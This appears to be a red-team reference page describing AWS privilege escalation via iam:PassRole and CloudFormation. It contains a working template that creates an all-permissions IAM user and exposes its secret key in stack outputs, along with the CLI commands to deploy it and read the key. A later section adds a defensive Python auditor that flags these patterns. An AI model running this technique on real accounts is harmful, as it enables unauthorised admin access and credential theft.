iam:PassRole, cloudformation:CreateStack, and cloudformation:DescribeStacks

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

An attacker could, for example, use a CloudFormation template that generates access keys for an admin user, like this:

{
    "Resources": {
        "AdminUser": {
            "Type": "AWS::IAM::User"
        },
        "AdminPolicy": {
            "Type": "AWS::IAM::ManagedPolicy",
            "Properties": {
                "Description": "This policy allows all actions on all resources.",
                "PolicyDocument": {
                    "Version": "2012-10-17",
                    "Statement": [
                        {
                            "Effect": "Allow",
                            "Action": [
                                "*"
                            ],
                            "Resource": "*"
                        }
                    ]
                },
                "Users": [{
                    "Ref": "AdminUser"
                }]
            }
        },
        "MyUserKeys": {
            "Type": "AWS::IAM::AccessKey",
            "Properties": {
                "UserName": {
                    "Ref": "AdminUser"
                }
            }
        }
    },
    "Outputs": {
        "AccessKey": {
            "Value": {
                "Ref": "MyUserKeys"
            },
            "Description": "Access Key ID of Admin User"
        },
        "SecretKey": {
            "Value": {
                "Fn::GetAtt": [
                    "MyUserKeys",
                    "SecretAccessKey"
                ]
            },
            "Description": "Secret Key of Admin User"
        }
    }
}

Then create the CloudFormation stack:

aws cloudformation create-stack --stack-name privesc \
    --template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \
    --role-arn arn:aws:iam::[REDACTED]:role/adminaccess \
    --capabilities CAPABILITY_IAM --region us-west-2

Wait a couple of minutes for the stack to be created, then read the stack's outputs, where the credentials are stored:

aws cloudformation describe-stacks \
    --stack-name arn:aws:cloudformation:us-west-2:[REDACTED]:stack/privesc/b4026300-d3fe-11e9-b3b5-06fe8be0ff5e \
    --region us-west-2
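
For reviewing templates before they are deployed with a privileged role, the following added example (not part of the original page) flags the three patterns the template above combines: an `AWS::IAM::AccessKey` resource, a policy allowing `*` on `*`, and an output that exposes `SecretAccessKey`. The function name `audit_template` and the finding strings are this example's own, and the sample is a condensed copy of the template shown above.

```python
import json

def _wild(value):
    # "*" alone or inside a list counts as a wildcard
    return value == "*" or (isinstance(value, list) and "*" in value)

def audit_template(template):
    """Return sorted (logical_id, finding) pairs for risky IAM patterns."""
    findings, key_ids = set(), set()
    for rid, res in template.get("Resources", {}).items():
        rtype, props = res.get("Type"), res.get("Properties", {})
        if rtype == "AWS::IAM::AccessKey":
            key_ids.add(rid)
            findings.add((rid, "creates long-lived access key"))
        elif rtype in ("AWS::IAM::ManagedPolicy", "AWS::IAM::Policy"):
            stmts = props.get("PolicyDocument", {}).get("Statement", [])
            # A single statement may be an object instead of a list
            for s in [stmts] if isinstance(stmts, dict) else stmts:
                if (s.get("Effect") == "Allow" and _wild(s.get("Action"))
                        and _wild(s.get("Resource"))):
                    findings.add((rid, "policy allows * on *"))
    # Outputs are readable by anyone who can call DescribeStacks
    for oid, out in template.get("Outputs", {}).items():
        value = out.get("Value")
        att = value.get("Fn::GetAtt") if isinstance(value, dict) else None
        if (isinstance(att, list) and len(att) == 2
                and att[0] in key_ids and att[1] == "SecretAccessKey"):
            findings.add((oid, "output exposes SecretAccessKey"))
    return sorted(findings)

# Constructed sample: condensed form of the template shown above.
SAMPLE = json.loads("""
{"Resources": {
   "AdminUser": {"Type": "AWS::IAM::User"},
   "AdminPolicy": {"Type": "AWS::IAM::ManagedPolicy", "Properties": {
      "PolicyDocument": {"Version": "2012-10-17", "Statement": [
         {"Effect": "Allow", "Action": ["*"], "Resource": "*"}]},
      "Users": [{"Ref": "AdminUser"}]}},
   "MyUserKeys": {"Type": "AWS::IAM::AccessKey",
      "Properties": {"UserName": {"Ref": "AdminUser"}}}},
 "Outputs": {
   "AccessKey": {"Value": {"Ref": "MyUserKeys"}},
   "SecretKey": {"Value": {"Fn::GetAtt": ["MyUserKeys", "SecretAccessKey"]}}}}
""")

if __name__ == "__main__":
    for logical_id, finding in audit_template(SAMPLE):
        print(f"{logical_id}: {finding}")
```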
